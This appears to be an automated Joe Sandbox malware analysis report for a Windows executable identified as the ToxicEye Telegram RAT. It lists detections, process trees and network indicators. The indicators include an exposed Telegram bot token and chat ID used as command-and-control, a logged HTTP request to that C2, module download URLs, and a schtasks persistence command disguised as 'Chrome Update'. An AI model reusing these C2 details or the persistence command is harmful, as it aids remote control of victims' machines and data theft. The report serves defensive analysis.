Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
dAIJ6g47mZ.exe

Overview

General Information

Sample name:dAIJ6g47mZ.exe
(renamed file extension from none to exe, renamed because original name is a hash value)
Original sample name:638f25147bfea8cdd2c8e010682388d64868d77e236995972059e7fcbcc6a517
Analysis ID:1379470
MD5:b4354ee75e6d043ad4ba2c6d2df30a6e
SHA1:ae7972c9427173e0aad8e4252d1b071d5978ba41
SHA256:638f25147bfea8cdd2c8e010682388d64868d77e236995972059e7fcbcc6a517
Infos:

Detection

Clipboard Hijacker, ToxicEye
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Clipboard Hijacker
Yara detected Telegram RAT
Yara detected Telegram Recon
Yara detected ToxicEye
C2 URLs / IPs found in malware configuration
Contains functionality to disable the Task Manager (.Net Source)
Contains functionality to log keystrokes (.Net Source)
Drops PE files to the user root directory
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • dAIJ6g47mZ.exe (PID: 2960 cmdline: C:\Users\user\Desktop\dAIJ6g47mZ.exe MD5: B4354EE75E6D043AD4BA2C6D2DF30A6E)
    • conhost.exe (PID: 6488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 3248 cmdline: C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "Chrome Update" /tr "C:\Users\ToxicEye\rat.exe MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 1292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6428 cmdline: "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmpE0C3.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmpE0C3.tmp.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7068 cmdline: Tasklist /fi "PID eq 2960" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • find.exe (PID: 6280 cmdline: find ":" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
      • timeout.exe (PID: 5868 cmdline: Timeout /T 1 /Nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)
      • rat.exe (PID: 5928 cmdline: "rat.exe" MD5: B4354EE75E6D043AD4BA2C6D2DF30A6E)
        • conhost.exe (PID: 4900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 2544 cmdline: C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "Chrome Update" /tr "C:\Users\ToxicEye\rat.exe MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • conhost.exe (PID: 3476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WerFault.exe (PID: 5044 cmdline: C:\Windows\system32\WerFault.exe -u -p 5928 -s 2976 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • rat.exe (PID: 992 cmdline: C:\Users\ToxicEye\rat.exe MD5: B4354EE75E6D043AD4BA2C6D2DF30A6E)
    • conhost.exe (PID: 3192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
ToxicEyeToxicEye is a ransomware that spreads through phishing emails. The malware encrypts system files with AES-256 and demands a ransom in Bitcoin.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.toxiceye
{"C2 url": "https://api.telegram.org/bot6047114553:AAGZa8paKPgCHpHO-afoS_3f5nKTHsmAnIo/sendMessage"}
{"C2 url": "https://api.telegram.org/bot6047114553:AAGZa8paKPgCHpHO-afoS_3f5nKTHsmAnIo/sendMessage?chat_id=6193406921"}
SourceRuleDescriptionAuthorStrings
dAIJ6g47mZ.exeJoeSecurity_TelegramReconYara detected Telegram ReconJoe Security
    dAIJ6g47mZ.exeJoeSecurity_ToxicEyeYara detected ToxicEyeJoe Security
      dAIJ6g47mZ.exeJoeSecurity_Clipboard_Hijacker_3Yara detected Clipboard HijackerJoe Security
        dAIJ6g47mZ.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          dAIJ6g47mZ.exeJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
            SourceRuleDescriptionAuthorStrings
            C:\Users\ToxicEye\rat.exeJoeSecurity_TelegramReconYara detected Telegram ReconJoe Security
              C:\Users\ToxicEye\rat.exeJoeSecurity_ToxicEyeYara detected ToxicEyeJoe Security
                C:\Users\ToxicEye\rat.exeJoeSecurity_Clipboard_Hijacker_3Yara detected Clipboard HijackerJoe Security
                  C:\Users\ToxicEye\rat.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    C:\Users\ToxicEye\rat.exeJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                      SourceRuleDescriptionAuthorStrings
                      00000000.00000000.2038996212.000001F365BF2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_ToxicEyeYara detected ToxicEyeJoe Security
                        00000000.00000000.2038996212.000001F365BF2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_Clipboard_Hijacker_3Yara detected Clipboard HijackerJoe Security
                          00000000.00000000.2038996212.000001F365BF2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                            00000000.00000000.2038996212.000001F365BF2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                              Process Memory Space: dAIJ6g47mZ.exe PID: 2960JoeSecurity_ToxicEyeYara detected ToxicEyeJoe Security
                                Click to see the 2 entries
                                SourceRuleDescriptionAuthorStrings
                                0.0.dAIJ6g47mZ.exe.1f365bf0000.0.unpackJoeSecurity_ToxicEyeYara detected ToxicEyeJoe Security
                                  0.0.dAIJ6g47mZ.exe.1f365bf0000.0.unpackJoeSecurity_Clipboard_Hijacker_3Yara detected Clipboard HijackerJoe Security
                                    0.0.dAIJ6g47mZ.exe.1f365bf0000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                                      0.0.dAIJ6g47mZ.exe.1f365bf0000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                                        No Sigma rule has matched
                                        No Snort rule has matched

                                        Click to jump to signature section

                                        Show All Signature Results

                                        AV Detection

                                        barindex
                                        Source: dAIJ6g47mZ.exeAvira: detected
                                        Source: https://raw.githubusercontent.com/LimerBoy/ToxicEye/master/TelegramRAT/TelegramRAT/core/libs/AudioSwAvira URL Cloud: Label: malware
                                        Source: https://raw.githubusercontent.com/LimerBoy/hackpy/master/modules/audio.zipAvira URL Cloud: Label: malware
                                        Source: https://raw.githubusercontent.com/LimerBoy/Adamantium-Thief/master/Stealer/Stealer/modules/libs/libsAvira URL Cloud: Label: malware
                                        Source: https://raw.githubusercontent.com/LimerBoy/Adamantium-Thief/master/Stealer/Stealer/modules/Sodium.dlAvira URL Cloud: Label: malware
                                        Source: https://raw.githubusercontent.com/LimerBoy/ToxicEye/master/TelegramRAT/TeAvira URL Cloud: Label: malware
                                        Source: C:\Users\ToxicEye\rat.exeAvira: detection malicious, Label: HEUR/AGEN.1307065
                                        Source: dAIJ6g47mZ.exeMalware Configuration Extractor: ToxicEye {"C2 url": "https://api.telegram.org/bot6047114553:AAGZa8paKPgCHpHO-afoS_3f5nKTHsmAnIo/sendMessage?chat_id=6193406921"}
                                        Source: rat.exe.5928.10.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6047114553:AAGZa8paKPgCHpHO-afoS_3f5nKTHsmAnIo/sendMessage"}
                                        Source: https://raw.githubusercontent.com/LimerBoy/hackpy/master/modules/audio.zipVirustotal: Detection: 12%Perma Link
                                        Source: https://raw.githubusercontent.com/LimerBoy/ToxicEye/master/TelegramRAT/TelegramRAT/core/libs/AudioSwVirustotal: Detection: 6%Perma Link
                                        Source: https://raw.githubusercontent.com/LimerBoy/Adamantium-Thief/master/Stealer/Stealer/modules/libs/libsVirustotal: Detection: 6%Perma Link
                                        Source: C:\Users\ToxicEye\rat.exeReversingLabs: Detection: 95%
                                        Source: C:\Users\ToxicEye\rat.exeVirustotal: Detection: 77%Perma Link
                                        Source: dAIJ6g47mZ.exeReversingLabs: Detection: 95%
                                        Source: dAIJ6g47mZ.exeVirustotal: Detection: 77%Perma Link
                                        Source: C:\Users\ToxicEye\rat.exeJoe Sandbox ML: detected
                                        Source: dAIJ6g47mZ.exeJoe Sandbox ML: detected
                                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49699 version: TLS 1.2
                                        Source: dAIJ6g47mZ.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                        Source: Binary string: System.Xml.ni.pdb source: WER284.tmp.dmp.18.dr
                                        Source: Binary string: TelegramRAT.pdb source: WER284.tmp.dmp.18.dr
                                        Source: Binary string: System.ni.pdbRSDS source: WER284.tmp.dmp.18.dr
                                        Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: rat.exe, 0000000A.00000002.2170409712.0000023F1DD34000.00000004.00000800.00020000.00000000.sdmp
                                        Source: Binary string: System.Windows.Forms.ni.pdb source: WER284.tmp.dmp.18.dr
                                        Source: Binary string: System.Drawing.ni.pdb source: WER284.tmp.dmp.18.dr
                                        Source: Binary string: System.Configuration.ni.pdb source: WER284.tmp.dmp.18.dr
                                        Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER284.tmp.dmp.18.dr
                                        Source: Binary string: System.Configuration.pdb source: WER284.tmp.dmp.18.dr
                                        Source: Binary string: \??\C:\Windows\System.pdb source: rat.exe, 0000000A.00000002.2171890625.0000023F36965000.00000004.00000020.00020000.00000000.sdmp
                                        Source: Binary string: System.Drawing.ni.pdbRSDS source: WER284.tmp.dmp.18.dr
                                        Source: Binary string: System.Core.pdbH source: WER284.tmp.dmp.18.dr
                                        Source: Binary string: System.Xml.pdb source: WER284.tmp.dmp.18.dr
                                        Source: Binary string: System.pdb source: rat.exe, 0000000A.00000002.2170409712.0000023F1DD34000.00000004.00000800.00020000.00000000.sdmp, rat.exe, 0000000A.00000002.2171890625.0000023F3697B000.00000004.00000020.00020000.00000000.sdmp, WER284.tmp.dmp.18.dr
                                        Source: Binary string: C:\Users\Gerrard\Downloads\ToxicEye-master\ToxicEye-master\TelegramRAT\TelegramRAT\obj\Release\TelegramRAT.pdb+ source: dAIJ6g47mZ.exe, rat.exe.0.dr
                                        Source: Binary string: System.Xml.ni.pdbRSDS# source: WER284.tmp.dmp.18.dr
                                        Source: Binary string: System.Core.ni.pdb source: WER284.tmp.dmp.18.dr
                                        Source: Binary string: System.Windows.Forms.pdb source: WER284.tmp.dmp.18.dr
                                        Source: Binary string: mscorlib.pdb source: WER284.tmp.dmp.18.dr
                                        Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER284.tmp.dmp.18.dr
                                        Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER284.tmp.dmp.18.dr
                                        Source: Binary string: System.pdbH source: WER284.tmp.dmp.18.dr
                                        Source: Binary string: System.Management.pdb source: WER284.tmp.dmp.18.dr
                                        Source: Binary string: System.Drawing.pdb source: WER284.tmp.dmp.18.dr
                                        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: rat.exe, 0000000A.00000002.2171890625.0000023F36940000.00000004.00000020.00020000.00000000.sdmp
                                        Source: Binary string: mscorlib.ni.pdb source: WER284.tmp.dmp.18.dr
                                        Source: Binary string: System.Management.ni.pdb source: WER284.tmp.dmp.18.dr
                                        Source: Binary string: C:\Users\Gerrard\Downloads\ToxicEye-master\ToxicEye-master\TelegramRAT\TelegramRAT\obj\Release\TelegramRAT.pdb source: dAIJ6g47mZ.exe, rat.exe.0.dr
                                        Source: Binary string: System.Core.pdb source: WER284.tmp.dmp.18.dr
                                        Source: Binary string: System.Windows.Forms.pdbIL_STUB_PInvoke source: WER284.tmp.dmp.18.dr
                                        Source: Binary string: System.Xml.pdbE source: WER284.tmp.dmp.18.dr
                                        Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER284.tmp.dmp.18.dr
                                        Source: Binary string: System.ni.pdb source: WER284.tmp.dmp.18.dr
                                        Source: Binary string: System.Core.ni.pdbRSDS source: WER284.tmp.dmp.18.dr

                                        Networking

                                        barindex
                                        Source: Malware configuration extractorURLs: https://api.telegram.org/bot6047114553:AAGZa8paKPgCHpHO-afoS_3f5nKTHsmAnIo/sendMessage?chat_id=6193406921
                                        Source: unknownDNS query: name: api.telegram.org
                                        Source: unknownDNS query: name: api.telegram.org
                                        Source: unknownDNS query: name: api.telegram.org
                                        Source: unknownDNS query: name: api.telegram.org
                                        Source: unknownDNS query: name: api.telegram.org
                                        Source: unknownDNS query: name: api.telegram.org
                                        Source: global trafficHTTP traffic detected: GET /bot6047114553:AAGZa8paKPgCHpHO-afoS_3f5nKTHsmAnIo/sendMessage?chat_id=6193406921&text=%F0%9F%8D%80%20Bot%20connected HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                                        Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                                        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                        Source: global trafficHTTP traffic detected: GET /bot6047114553:AAGZa8paKPgCHpHO-afoS_3f5nKTHsmAnIo/sendMessage?chat_id=6193406921&text=%F0%9F%8D%80%20Bot%20connected HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                                        Source: unknownDNS traffic detected: queries for: google.com
                                        Source: rat.exe, 0000000A.00000002.2170409712.0000023F1DD10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                                        Source: dAIJ6g47mZ.exe, rat.exe.0.drString found in binary or memory: http://ip-api.com/json/
                                        Source: dAIJ6g47mZ.exe, 00000000.00000002.2072333627.000001F367981000.00000004.00000800.00020000.00000000.sdmp, rat.exe, 0000000A.00000002.2170409712.0000023F1DBE9000.00000004.00000800.00020000.00000000.sdmp, rat.exe, 0000000C.00000002.2093053581.000001EF99EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                        Source: Amcache.hve.18.drString found in binary or memory: http://upx.sf.net
                                        Source: dAIJ6g47mZ.exe, rat.exe.0.drString found in binary or memory: https://api.mylnikov.org/geolocation/wifi?bssid=
                                        Source: rat.exe, 0000000A.00000002.2170409712.0000023F1DCD0000.00000004.00000800.00020000.00000000.sdmp, rat.exe, 0000000A.00000002.2170409712.0000023F1DCEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                                        Source: dAIJ6g47mZ.exe, rat.exe.0.drString found in binary or memory: https://api.telegram.org/bot
                                        Source: dAIJ6g47mZ.exe, rat.exe.0.drString found in binary or memory: https://api.telegram.org/bot6047114553:AAGZa8paKPgCHpHO-afoS_3f5nKTHsmAnIo/getFile?file_id=
                                        Source: dAIJ6g47mZ.exe, rat.exe.0.drString found in binary or memory: https://api.telegram.org/bot6047114553:AAGZa8paKPgCHpHO-afoS_3f5nKTHsmAnIo/getUpdates
                                        Source: dAIJ6g47mZ.exe, rat.exe.0.drString found in binary or memory: https://api.telegram.org/bot6047114553:AAGZa8paKPgCHpHO-afoS_3f5nKTHsmAnIo/send
                                        Source: dAIJ6g47mZ.exe, rat.exe.0.drString found in binary or memory: https://api.telegram.org/bot6047114553:AAGZa8paKPgCHpHO-afoS_3f5nKTHsmAnIo/sendLocation?chat_id=6193
                                        Source: rat.exe, 0000000A.00000002.2170409712.0000023F1DCD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6047114553:AAGZa8paKPgCHpHO-afoS_3f5nKTHsmAnIo/sendMessage
                                        Source: dAIJ6g47mZ.exe, rat.exe.0.drString found in binary or memory: https://api.telegram.org/bot6047114553:AAGZa8paKPgCHpHO-afoS_3f5nKTHsmAnIo/sendMessage?chat_id=
                                        Source: rat.exe, 0000000A.00000002.2170409712.0000023F1DCD0000.00000004.00000800.00020000.00000000.sdmp, rat.exe, 0000000A.00000002.2170409712.0000023F1DCE4000.00000004.00000800.00020000.00000000.sdmp, rat.exe, 0000000A.00000002.2170409712.0000023F1DC48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6047114553:AAGZa8paKPgCHpHO-afoS_3f5nKTHsmAnIo/sendMessage?chat_id=61934
                                        Source: dAIJ6g47mZ.exe, rat.exe.0.drString found in binary or memory: https://api.telegram.org/file/bot6047114553:AAGZa8paKPgCHpHO-afoS_3f5nKTHsmAnIo/
                                        Source: dAIJ6g47mZ.exe, rat.exe.0.drString found in binary or memory: https://raw.githubusercontent.com/LimerBoy/Adamantium-Thief/master/Stealer/Stealer/modules/Sodium.dl
                                        Source: rat.exe.0.drString found in binary or memory: https://raw.githubusercontent.com/LimerBoy/Adamantium-Thief/master/Stealer/Stealer/modules/libs/libs
                                        Source: dAIJ6g47mZ.exe, 00000000.00000002.2072581575.000001F37FD4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/LimerBoy/ToxicEye/master/TelegramRAT/Te
                                        Source: rat.exe.0.drString found in binary or memory: https://raw.githubusercontent.com/LimerBoy/ToxicEye/master/TelegramRAT/TelegramRAT/core/libs/AudioSw
                                        Source: dAIJ6g47mZ.exe, rat.exe.0.drString found in binary or memory: https://raw.githubusercontent.com/LimerBoy/hackpy/master/modules/audio.zip
                                        Source: dAIJ6g47mZ.exe, rat.exe.0.drString found in binary or memory: https://raw.githubusercontent.com/tedburke/CommandCam/master/CommandCam.exe
                                        Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
                                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
                                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49699 version: TLS 1.2

                                        Key, Mouse, Clipboard, Microphone and Screen Capturing

                                        barindex
                                        Source: dAIJ6g47mZ.exe, utils.cs.Net Code: KeyboardLayout
                                        Source: rat.exe.0.dr, utils.cs.Net Code: KeyboardLayout
                                        Source: C:\Users\ToxicEye\rat.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                                        Operating System Destruction

                                        barindex
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeProcess information set: 00 00 00 00 Jump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess information set: 01 00 00 00 Jump to behavior
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeCode function: 0_2_00007FFD348A6C060_2_00007FFD348A6C06
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeCode function: 0_2_00007FFD348A79B20_2_00007FFD348A79B2
                                        Source: C:\Users\ToxicEye\rat.exeCode function: 10_2_00007FFD348879B210_2_00007FFD348879B2
                                        Source: C:\Users\ToxicEye\rat.exeCode function: 10_2_00007FFD34886C0610_2_00007FFD34886C06
                                        Source: C:\Users\ToxicEye\rat.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5928 -s 2976
                                        Source: dAIJ6g47mZ.exe, 00000000.00000000.2038996212.000001F365BF2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameTelegramRAT.exe8 vs dAIJ6g47mZ.exe
                                        Source: dAIJ6g47mZ.exeBinary or memory string: OriginalFilenameTelegramRAT.exe8 vs dAIJ6g47mZ.exe
                                        Source: dAIJ6g47mZ.exe, utils.csCryptographic APIs: 'CreateDecryptor'
                                        Source: rat.exe.0.dr, utils.csCryptographic APIs: 'CreateDecryptor'
                                        Source: rat.exe.0.dr, utils.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                                        Source: rat.exe.0.dr, utils.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                        Source: dAIJ6g47mZ.exe, utils.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                                        Source: dAIJ6g47mZ.exe, utils.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                        Source: dAIJ6g47mZ.exe, rat.exe.0.drBinary or memory string: .pptx.odt.csv.sql.mdb.sln.php
                                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@23/13@7/2
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeFile created: C:\Users\ToxicEyeJump to behavior
                                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4900:120:WilError_03
                                        Source: C:\Users\ToxicEye\rat.exeMutant created: \Sessions\1\BaseNamedObjects\ADMIN:91f124ef01f5ceb937505ec41d979375
                                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3192:120:WilError_03
                                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3476:120:WilError_03
                                        Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5928
                                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1292:120:WilError_03
                                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6488:120:WilError_03
                                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5208:120:WilError_03
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeFile created: C:\Users\user\AppData\Local\Temp\tmpE0C3.tmpJump to behavior
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmpE0C3.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmpE0C3.tmp.bat
                                        Source: dAIJ6g47mZ.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        Source: dAIJ6g47mZ.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dllJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dllJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dllJump to behavior
                                        Source: C:\Windows\System32\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dllJump to behavior
                                        Source: C:\Windows\System32\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dllJump to behavior
                                        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE ProcessId = 2960
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                        Source: dAIJ6g47mZ.exeReversingLabs: Detection: 95%
                                        Source: dAIJ6g47mZ.exeVirustotal: Detection: 77%
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeFile read: C:\Users\user\Desktop\dAIJ6g47mZ.exeJump to behavior
                                        Source: unknownProcess created: C:\Users\user\Desktop\dAIJ6g47mZ.exe C:\Users\user\Desktop\dAIJ6g47mZ.exe
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "Chrome Update" /tr "C:\Users\ToxicEye\rat.exe
                                        Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmpE0C3.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmpE0C3.tmp.bat
                                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe Tasklist /fi "PID eq 2960"
                                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find ":"
                                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe Timeout /T 1 /Nobreak
                                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\ToxicEye\rat.exe "rat.exe"
                                        Source: C:\Users\ToxicEye\rat.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Source: unknownProcess created: C:\Users\ToxicEye\rat.exe C:\Users\ToxicEye\rat.exe
                                        Source: C:\Users\ToxicEye\rat.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Source: C:\Users\ToxicEye\rat.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "Chrome Update" /tr "C:\Users\ToxicEye\rat.exe
                                        Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Source: C:\Users\ToxicEye\rat.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5928 -s 2976
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "Chrome Update" /tr "C:\Users\ToxicEye\rat.exeJump to behavior
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmpE0C3.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmpE0C3.tmp.batJump to behavior
                                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe Tasklist /fi "PID eq 2960" Jump to behavior
